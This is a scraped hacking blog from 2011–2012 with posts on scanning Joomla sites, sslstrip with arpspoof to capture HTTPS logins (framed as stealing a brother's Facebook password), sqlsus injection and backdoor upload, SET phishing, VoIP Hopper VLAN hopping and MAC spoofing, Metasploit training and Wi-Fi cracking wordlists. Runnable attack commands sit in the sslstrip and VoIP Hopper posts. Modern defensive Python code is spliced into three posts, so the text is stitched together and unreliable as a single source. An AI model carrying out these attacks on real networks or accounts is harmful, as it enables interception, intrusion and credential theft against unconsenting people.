
Hacking Joomla Blog with Backtrack 5 r2

Here I am with a new working procedure to scan and exploit a Joomla blog. You will need the following:
1. Backtrack 5
2. Internet connection
Follow all of the steps below in the order given:

 1. Click on Applications/Backtrack/Vulnerability assessment/Web Vulnerability assessment/CMS Vulnerability Identification/joomscan.

 2. The Joomla scanner console will open, as shown in the image.

 3. In the console, type chmod 0777 joomscan.pl and hit Enter. (Only the execute bit is actually needed; chmod u+x joomscan.pl does that without making the file world-writable.)

 4. Type ./joomscan.pl -u www.YourJoomlasite.com, replacing YourJoomlasite.com with the Joomla site you want to scan, and hit Enter; the scan starts.

This article was written by Aditya Joshi, who blogs at http://adityahackingarticles.blogspot.in . If you are interested in writing an article too, email it to haseeblog@gmail.com
Monday, April 16, 2012
Posted by Anonymous

SSL Strip - Video Tutorial



What is SSL Strip?

SSL strip is a piece of software used to sniff data that travels over HTTPS. A sniffer reads all the data sent over a network between a user and the router, but nowadays SSL ("HTTPS") makes it very difficult to get anything useful out of it (like the Facebook password of your brother in the other room). So here is a tool that can intercept even the data sent over HTTPS.


Running sslstrip

  • Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
  • Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
  • Run sslstrip. (sslstrip.py -l <listenPort>)
  • Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.
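The two steps just described (the target's ARP cache now maps the gateway IP to the attacker's MAC, and one MAC answers for two IPs) are also the footprint a defender can look for. The following is an added example, not code from the original post or from the sslstrip project: it parses a constructed log of ARP replies in a made-up "<time> <ip> is-at <mac>" format (an assumption; adapt the regex to whatever your sniffer emits) and raises an alert when an IP's MAC changes or when one MAC claims several IPs.

```python
import re
from collections import defaultdict

# Constructed sample of ARP replies, one per line, in the form a small
# sniffer might log them: "<time> <sender_ip> is-at <sender_mac>".
# Sample data only, not a real capture.
SAMPLE_ARP_LOG = """\
10:00:01 192.168.1.1 is-at 00:11:22:33:44:01
10:00:02 192.168.1.10 is-at 00:11:22:33:44:10
10:00:05 192.168.1.1 is-at 00:11:22:33:44:10
10:00:06 192.168.1.1 is-at 00:11:22:33:44:10
10:00:07 192.168.1.20 is-at 00:11:22:33:44:20
"""

# Assumed log line format; change this to match your own sniffer's output.
ARP_LINE = re.compile(
    r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+([0-9a-fA-F:]{17})$"
)


def parse_arp_log(text):
    """Parse log lines into (timestamp, ip, mac) tuples; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            records.append((m.group(1), m.group(2), m.group(3).lower()))
    return records


def detect_arp_spoof(records, gateway_ip=None):
    """Return alert strings for the two signals the poisoning step leaves behind.

    1. An IP whose advertised MAC changes over time (HIGH when it is the
       gateway, which is exactly what the target sees during arpspoof).
    2. One MAC answering for more than one IP: the spoofing host keeps its
       own address and now also claims the gateway's.
    """
    last_mac = {}                   # ip -> most recent MAC advertised for it
    mac_to_ips = defaultdict(set)   # mac -> every IP it has claimed so far
    alerts = []
    for ts, ip, mac in records:
        prev = last_mac.get(ip)
        if prev is not None and prev != mac:
            severity = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{severity} {ts}: {ip} moved from {prev} to {mac}")
        last_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            alerts.append(f"MEDIUM: {mac} claims several IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(parse_arp_log(SAMPLE_ARP_LOG), gateway_ip="192.168.1.1"):
        print(alert)
```

On the sample data this reports the gateway's MAC changing at 10:00:05 and the same MAC claiming both 192.168.1.1 and 192.168.1.10. Detection is the second line of defence; static ARP entries or switch-side Dynamic ARP Inspection stop the poisoning itself, and HSTS (Strict-Transport-Security) stops the browser from accepting the plain-HTTP downgrade that sslstrip relies on.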

VIDEO TUTORIAL
==============
Sunday, December 25, 2011
Posted by Anonymous

SQLsus - MySql Injection Tutorial


sqlsus is an open source MySQL injection and takeover tool, written in Perl.
Via a command line interface, you can retrieve the database(s) structure, inject your own SQL queries (even complex ones), download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database(s), and much more...
Whenever relevant, sqlsus will mimic MySQL console output.

sqlsus focuses on speed and efficiency, optimising the available injection space and making the best use (I can think of) of MySQL functions.
It uses stacked subqueries and a powerful blind injection algorithm to maximise the data gathered per web server hit.
Using multithreading on top of that, sqlsus is an extremely fast database dumper, be it for inband or blind injection.
If the privileges are high enough, sqlsus will be a great help for uploading a backdoor through the injection point and taking over the web server.
It uses SQLite as a backend, for easier use of what has been dumped, and integrates a lot of the usual features (see below) such as cookie support, socks/http proxying, https...

FEATURES

GENERAL

Both quoted and numeric injections are supported.
Database names, table names, column names, count(*) per table, privileges... On MySQL > 5, the database structure can be grabbed in one command from within sqlsus.
Discovery of the exact injection space, going through all possible restrictions (web server, suhosin patch...), to inject as much as possible at once.
All quoted text can be translated to its hex equivalent to bypass any quote filtering (eg: magic_quotes_gpc) (eg: "sqlsus" will become 0x73716c737573).
sqlsus also supports these types of injection :
  • inband (UNION w/ stacked subqueries) : the result of the request will be in the HTML returned by the web server
  • blind (boolean-based or time-based) : when you can't see the result of the request directly
Support for GET and POST parameters injection vectors.
Support for HTTP proxy and HTTP simple authentication.
Support for HTTPS.
Support for socks proxy.
Support for cookies.
Support for retrieving binary data.
Full SQLite backend, storing queries / results as they come, databases structure, key variables. This allows you to recall a command and its cached answer, even in a later re-use of the session.
Possibility to clone a database / table / column, into a local SQLite database, and continue over different sessions.
If you can't access the information_schema database, or if it doesn't exist, sqlsus will help you bruteforce the names of the tables and columns.
Possibility to change the current database and still use all the commands transparently.
Auto-detection of the length restriction in place, be it the web server or the layer above (eg: suhosin).

INBAND

If your query is likely to return more than one row, sqlsus will use as many subqueries as it can at a time (per query), staying under a configurable limit.
Therefore, it can grab up to thousands of records in just 1 server hit (depending on the available injection space) (cf inband demo).
Once you have found an inband injection, you need to find the correct number of columns for UNION. sqlsus will do the job for you, identifying the needed number of columns and which of them are suitable for injection.
To speed things up, multithreading (actually, multiple processes (fork)) can be used.

BLIND

Blind injection is supported, using conditional responses, and multithreading (actually, again, multiple processes (fork)).
The engine has been optimised for speed and number of server hits:
  • keep all the threads busy with small relevant tasks.
  • match each item against a few regular expressions, prior to bruteforcing, to determine the character space to use, greatly reducing the number of hits required.
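The hex-literal trick in the GENERAL section ("sqlsus" becoming 0x73716c737573 to get past magic_quotes_gpc) and the inband and blind injection styles listed above each leave a recognisable shape in the request. The following is an added example, not code from the original post or from sqlsus itself: it implements the string-to-hex-literal conversion the description states (and its inverse, so an analyst can read a captured payload), then runs a small set of detection signatures over constructed web server access-log lines. The log format, parameter names and client addresses are sample data.

```python
import re
from urllib.parse import urlsplit, parse_qsl


def to_mysql_hex(text):
    """Encode text as the 0x... literal MySQL accepts in place of a quoted string
    ('sqlsus' -> '0x73716c737573', as the description above states)."""
    return "0x" + text.encode("utf-8").hex()


def from_mysql_hex(literal):
    """Decode a 0x... literal back to text so an analyst can read the payload."""
    digits = literal[2:]
    if len(digits) % 2:
        return None                     # odd digit count: not a byte string
    return bytes.fromhex(digits).decode("utf-8", errors="replace")


# Signatures for the injection styles described above. They are deliberately
# narrow; a real deployment would tune them against its own traffic.
SIGNATURES = {
    "hex-literal": re.compile(r"0x[0-9a-fA-F]{4,}(?![0-9a-zA-Z])"),
    "inband-union": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "blind-boolean": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b", re.I),
    "blind-time": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
}
# Common log format: client ident user [time] "METHOD target HTTP/x" ...
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines (sample data, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2011:10:00:01 +0000] "GET /index.php?id=3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2011:10:00:02 +0000] "GET /index.php?id=3+UNION+SELECT+1,0x73716c737573,3 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [18/Dec/2011:10:00:03 +0000] "GET /index.php?id=3+AND+1=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2011:10:00:04 +0000] "GET /index.php?id=3+AND+SLEEP(5) HTTP/1.1" 200 512',
]


def inspect_params(query):
    """Return {param: [(signature, evidence), ...]} for parameters that match."""
    findings = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = []
        for sig, pattern in SIGNATURES.items():
            m = pattern.search(value)
            if not m:
                continue
            evidence = m.group(0)
            if sig == "hex-literal":
                decoded = from_mysql_hex(evidence)
                if decoded is not None:
                    evidence = f"{evidence} ({decoded!r})"
            hits.append((sig, evidence))
        if hits:
            findings[name] = hits
    return findings


def scan_log(lines):
    """Return (client_ip, path, findings) for every request that trips a signature."""
    results = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        findings = inspect_params(parts.query)
        if findings:
            results.append((client, parts.path, findings))
    return results


if __name__ == "__main__":
    for client, path, findings in scan_log(SAMPLE_LOG):
        print(client, path, findings)
```

The decoded hex literal is the point for defenders: quote filtering such as magic_quotes_gpc never sees a quote in 0x73716c737573, which is why parameterised queries, not input filtering, are the fix for the injection point itself; the signatures above only tell you that someone is probing it.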

TAKEOVER

If the database user has the FILE privilege, and if you can use quotes in your injection (mandatory for a SELECT INTO OUTFILE), then sqlsus will help you place a php backdoor on the remote system, recursively looking for writable directories.
You can use download <file> from the sqlsus shell to download an arbitrary (world readable) file from the remote server. The file will be stored in the local filesystem, rebuilding the path tree to the file in the data directory.
sqlsus has the ability to crawl the website at a configurable depth, looking for all the directories it can find, via hypertext links, img links, etc... Then, it tries to upload a tiny php uploader on each candidate directory until it finds one world writable, later used to upload the backdoor itself.
All sqlsus needs (besides what has been said above) is the document_root used server side. You can find it by downloading/reading the relevant files on the web server.
It ships with a PHP backdoor you can upload and a controller, to help you execute system commands, PHP commands, and SQL queries as if you were sitting on a normal direct MySQL connection.

GETTING STARTED

Generate a configuration file with sqlsus --genconf my.cfg, read the comments and adapt it to reflect your target.
Launch sqlsus, with your configuration as a parameter sqlsus my.cfg, you will get a shell.
Type help and follow your instincts :)


Sources:
Sunday, December 18, 2011
Posted by Anonymous

Social-Engineering Toolkit (SET) - Video Tutorials





The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack: one utilizes Metasploit[1] payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering.


Official Site: http://www.social-engineer.org/



Sample Usage:
==========================================



root@netinfinity-laptop:/pentest/web_2a/web2a/social_engineering_toolkit# python set


    [---]       The Social Engineering Toolkit (SET)     [---]
    [---] Written by David Kennedy (ReL1K) @ SecureState [---]
    [---]               Version: 0.2 Alpha               [---]

Welcome to the Social Engineering Toolkit, your one-stop shop
for all of your social engineering needs. 

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks
2. Website Attacks
3. Update the Metasploit Framework
4. Update the Social-Engineering Toolkit
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 





VIDEO TUTORIALS:


1:  Phishing Attack Demo Using The Social Engineering Toolkit

2:  Java Applet Attack Using The Social Engineering Toolkit


Source: http://tools.securitytube.net/index.php?title=Social-Engineering_Toolkit_(SET)
Friday, December 9, 2011
Posted by Anonymous

VoIP Hopper - Features and Video Tutorial





VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop security test.  VoIP Hopper is a VoIP infrastructure security testing tool but also a tool that can be used to test the (in)security of VLANs. 


Features:



  • Can automatically discover the VLAN ID and VLAN Hop (add a VoIP Interface, send a "tagged" dhcp request)
  • VLAN protocol discovery methods:  CDP, Avaya DHCP, Nortel DHCP, LLDP-MED (Cisco), 802.1q
  • Assessment mode:  Interactive, menu driven command interface (-z)
  • Assessment mode:  Manually spoof CDP or LLDP-MED, or automatically VLAN Hop based on first discovered VVID
  • Assessment mode:  DHCP client automatically times out if DHCP is disabled, and still adds the VoIP interface and ARP sniffer
  • Assessment mode:  Can set a static IP address and spoof the MAC address of a previously discovered IP Phone, from a menu list ('s' option)
  • Assessment mode:  Analyze and record any discovered hosts (IP and MAC) on default interface to hosts.txt file
  • Assessment mode:  Automatically adds an ARP sniffer to VoIP VLAN interface after VLAN Hop, and records any discovered IP Phones (IP and MAC) to a file, voip-hosts.txt
  • Can VLAN Hop without discovery, by the Administrator specifying a VLAN ID to attempt to "Hop" into (-v)
  • VoIP DHCP client:  A fully integrated DHCP client.  VoIP Hopper implements DHCP messaging as function calls instead of relying on the old 'dhcpcd' client.  This opens up the door for future VLAN Discovery mechanisms for other vendors, such as Alcatel.
  • CDP Modes:  Can spoof a Cisco IP Phone and automatically VLAN Hop, using three methods.  1)  CDP sniffing, 2) Spoofing a CDP packet specified by user input, 3) Spoofing a pre-constructed IP Phone packet of a Cisco 7971G-GE (fastest method)
  • Avaya IP Phone VLAN discovery:  Can spoof the DHCP client Option 176 used by an Avaya IP Phone in order to automatically discover the VVID, and VLAN Hop.
  • Nortel IP Phone VLAN discovery:  Can spoof the DHCP client Option 191 used by a Nortel IP Phone in order to automatically discover the VVID, and VLAN Hop.
  • LLDP-MED support:  Support for sniffing or spoofing LLDP-MED capabilities used by an IP Phone, in order to enumerate the Voice VLAN ID.
  • 802.1q VLAN Discovery:  By default, most ethernet switch ports that terminate IP Phones are enabled for 802.1q trunking, and permit access for at least two VLANs.  The broadcast ethernet frames of IP Phones (ARP) will be sent, tagged, to all members (switch ports) of the broadcast domain (all IP Phones on the VoIP VLAN).  By running a simple sniffer, you can capture the VVID.  VoIP Hopper automates this method of VVID discovery.
  • Error correction with VLAN Interfaces:  Implemented a feature that checks to see if the IP address is already configured for the voice interface before attempting to add the new virtual interface, and tag the DHCP request.
  • 802.1x Anonymous Voice VLAN Bypass:  VoIP Hopper can generate CDP packets in order to discover the Voice VLAN ID, as any IP Phone based on CDP would do.  In this CDP spoof mode, VoIP Hopper will send two CDP packets in order to decipher the VVID, then it will iterate between sleeping for 60 seconds, and sending another packet.  Not only is this faster than CDP sniffing, but it can also help bypass any mechanisms that rely on CDP for permitting access to the Voice VLAN.
  • Voice VLAN Interface Delete:  VoIP Hopper can delete the created Voice interface (-d).
  • MAC Address Spoof, then exit:  VoIP Hopper can change the MAC Address of an interface offline and exit, without VLAN Hopping.
  • MAC Address spoof and automatic VLAN Hop, supporting multiple discovery methods
  • MAC Address spoof, only on new VoIP Interface (keep default interface the same MAC Address) (-D)
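The "802.1q VLAN Discovery" item above rests on one fact: an IP phone's broadcast frames arrive tagged, so the Voice VLAN ID is readable by anyone who can parse the 802.1Q header. The following is an added example, not code from the original post or from VoIP Hopper: it builds constructed Ethernet frames (made-up MAC addresses, a stub ARP body) with zero, one or two VLAN tags, parses the tag stack back out, and flags tagged frames on a port that should carry only an allow-listed VLAN. That last check is the defender's version of the same sniffing: run it on an access port and any VVID that shows up is a VLAN the switch is leaking to that port.

```python
import struct

ETHERTYPE_VLAN = 0x8100   # 802.1Q customer tag
ETHERTYPE_QINQ = 0x88A8   # 802.1ad service (outer) tag
ETHERTYPE_ARP = 0x0806

BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _mac_bytes(text):
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def build_frame(dst, src, ethertype, payload, vids=(), pcp=0):
    """Construct an Ethernet frame, optionally with one or more VLAN tags.
    With two or more VIDs the outermost tag uses the 802.1ad TPID (QinQ)."""
    frame = _mac_bytes(dst) + _mac_bytes(src)
    for i, vid in enumerate(vids):
        tpid = ETHERTYPE_QINQ if (len(vids) > 1 and i == 0) else ETHERTYPE_VLAN
        tci = ((pcp & 0x7) << 13) | (vid & 0x0FFF)   # PCP(3) DEI(1) VID(12)
        frame += struct.pack("!HH", tpid, tci)
    return frame + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    """Decode dst, src, every VLAN tag (vid, pcp, dei), the final EtherType and
    the payload. Raises ValueError on a truncated frame."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    offset, tags = 14, []
    while ethertype in (ETHERTYPE_VLAN, ETHERTYPE_QINQ):
        if len(frame) < offset + 4:
            raise ValueError("truncated VLAN tag")
        tci, ethertype = struct.unpack("!HH", frame[offset:offset + 4])
        tags.append({"vid": tci & 0x0FFF, "pcp": tci >> 13, "dei": (tci >> 12) & 1})
        offset += 4
    return {"dst": _mac_str(dst), "src": _mac_str(src), "tags": tags,
            "ethertype": ethertype, "payload": frame[offset:]}


def audit_access_port(frames, allowed_vids=frozenset()):
    """Report (src_mac, outer_vid) for every tagged frame whose VLAN is not on
    the allow list: that is the VVID a sniffer on the port would learn."""
    leaks = []
    for raw in frames:
        parsed = parse_frame(raw)
        if parsed["tags"] and parsed["tags"][0]["vid"] not in allowed_vids:
            leaks.append((parsed["src"], parsed["tags"][0]["vid"]))
    return leaks


# Constructed sample frames (not a real capture). The ARP body is a fixed stub.
ARP_STUB = b"\x00\x01\x08\x00\x06\x04\x00\x01" + b"\x00" * 20
PHONE_MAC = "00:1e:f7:00:00:01"     # made-up phone address
PC_MAC = "00:50:56:00:00:02"        # made-up workstation address
SAMPLE_FRAMES = [
    build_frame(BROADCAST, PHONE_MAC, ETHERTYPE_ARP, ARP_STUB, vids=(200,), pcp=5),
    build_frame(BROADCAST, PC_MAC, ETHERTYPE_ARP, ARP_STUB),
    build_frame(BROADCAST, PC_MAC, ETHERTYPE_ARP, ARP_STUB, vids=(100, 200)),
]

if __name__ == "__main__":
    for raw in SAMPLE_FRAMES:
        print(parse_frame(raw)["tags"])
    print(audit_access_port(SAMPLE_FRAMES, allowed_vids={100}))
```

With VLAN 100 allowed, the audit reports the phone's tagged broadcast on VLAN 200 and nothing else. The double-tagged third frame is included because a parser that stops after one tag would misreport its payload type; the loop above keeps reading while the EtherType is a tag TPID.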

Example Usage:


Some quick sample usages for VoIP Hopper are listed below.

  • One of the most effective ways to run VoIP Hopper is the new, interactive assessment mode.  Simply run it as follows:  
        voiphopper -i eth0 -z
  • LLDP-MED spoofing:  You can spoof LLDP-MED packets to quickly learn the Voice VLAN ID, as follows:
        voiphopper -i eth0 -o 001EF7289C8E
  • There are three CDP modes for VoIP Hopper.  Sniff (-c 0), Spoof with custom packet (-c 1), and Spoof with pre-made packet (-c 2).  To sniff for CDP and run a VLAN Hop into the Voice VLAN, simply run VoIP Hopper on the ethernet interface, in the following way:
        voiphopper -i eth0 -c 0
  • To spoof CDP in order to more rapidly hop to the Voice VLAN in Cisco SIP environments, run VoIP Hopper in the following way:
        voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
  • To spoof CDP in order to more rapidly hop to the Voice VLAN in Cisco SCCP environments, run VoIP Hopper in the following way:
        voiphopper -i eth0 -c 1 -E 'SEP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P00308000700' -U 1
  • To spoof CDP with a pre-made packet generated by a Cisco 7971G-GE IP Phone:
        voiphopper -i eth0 -c 2
  • VoIP Hopper also allows one to VLAN Hop to an arbitrary VLAN, without sniffing for CDP.  If you already know the Voice VLAN ID, or would like to VLAN Hop into another VLAN (without sniffing for CDP), you can run it in the following way (target VLAN ID is '200'):
        voiphopper -i eth0 -v 200
  • To discover the Voice VLAN in an Avaya IP Phone environment and automatically jump VLANs:
        voiphopper -i eth0 -a
  • To discover the Voice VLAN in a Nortel IP Phone environment and automatically jump VLANs:
        voiphopper -i eth0 -n
  • To spoof the MAC address of an IP Phone by sniffing for CDP (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -c 0 -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone using an Avaya DHCP request (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -a -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone by VLAN Hopping without CDP or DHCP (this changes the MAC address of default interface and new interface):
        voiphopper -i eth0 -v 200 -m AA:AA:AA:AA:AA:AA
  • To spoof the MAC address of an IP Phone without changing the MAC address of the default ethernet interface (only spoof the new voice interface's MAC address):
        voiphopper -i eth0 -v 200 -m AA:AA:AA:AA:AA:AA -D
  • To simply spoof the MAC address of an interface and then exit:
        voiphopper -i eth0 -m AA:AA:AA:AA:AA:AA
  • To delete the VoIP interface (eth0.200) created by VoIP Hopper:
        voiphopper -d eth0.200


==============
VIDEO Tutorials:
==============

Tutorial 1:  Assessment Mode video tutorial for VoIP Hopper 2.0

Here is a tutorial demonstrating the new, exciting features for Assessment mode.  Until I can integrate DHCP spoofing for Avaya/Nortel into assessment mode, I've also shown how to do both Avaya and Nortel VLAN discovery at the end of the video.


Tutorial 2:  LLDP-MED features of VoIP Hopper

Here is a tutorial demonstrating the new LLDP-MED capabilities.


Tutorial 3:  Hotel Exploit Demo ~ When DHCP is disabled

Here is a tutorial demonstrating the same live demo showed at DefCon 19, in which DHCP was disabled on the VoIP VLAN subnet.  VoIP Hopper can still VLAN Hop and spoof the IP and MAC address of an IP Phone, as selected by the user.  This is a demonstration of the "s" option of Assessment mode.
Wednesday, December 7, 2011
Posted by Anonymous

ARMITAGE AND METASPLOIT TRAINING: Team Tactics!



Today is the last episode of this training, and it deals with the team tactics involved in using Metasploit!

==========
Team Tactics:
==========

Saturday, November 26, 2011
Posted by Anonymous

ARMITAGE AND METASPLOIT TRAINING: Maneuver

Today is the fifth part of the series, and it deals with maneuver.


=========
Maneuver:
=========


Thursday, November 24, 2011
Posted by Anonymous

ARMITAGE AND METASPLOIT TRAINING: Post-Exploitation





This Video Tutorial deals with the Post-Exploitation Stuff and details.

============
Post-Exploitation:
============

Wednesday, November 23, 2011
Posted by Anonymous

Armitage And Metasploit Training: Access





Today it is the turn of the third part of the installment; it is about exploiting and accessing the compromised machine.

=======
ACCESS:
=======


Tuesday, November 22, 2011
Posted by Anonymous

Armitage And Metasploit Training: METASPLOIT.


Today is the second installment of the Metasploit and Armitage training. This video deals with operating the Metasploit Framework.

===========
METASPLOIT:
===========


Monday, November 21, 2011
Posted by Anonymous

Armitage And Metasploit Training: Introduction.




Today I am going to share a very good video training on pen testing with the famous Metasploit and Armitage. Today comes the first part, which covers the introduction; the others will follow soon.

==============
INTRODUCTION:
==============


Sunday, November 20, 2011
Posted by Anonymous

WPA/WEP/WPA2 Cracking Dictionary Wordlist


Some days back I got a request from one of my blog's readers about WEP, WPA, WPA2 or Wifi cracking dictionary files. As everyone who has tried wireless hacking and used the cracking software knows, the dictionary or wordlist provided with the software is not enough and lacks a lot. So following are links to the websites where you can download wordlists for free.



====================
Source: http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/
===============

And here is the torrent link to the biggest wordlist available on the internet. It is more than 13 GB in size and contains billions of passwords!

Link:> http://torcache.net/torrent/6C89DF058F71559DEC6C5C7C9F2CB419182B3294.torrent?title=[kat.ph]collection.of.wordlist.dictionaries.for.cracking.wifi.wpa.wpa2


A thanks is all I need, and by the way, if any one of you has a request, let me know!
Tuesday, November 8, 2011
Posted by Anonymous
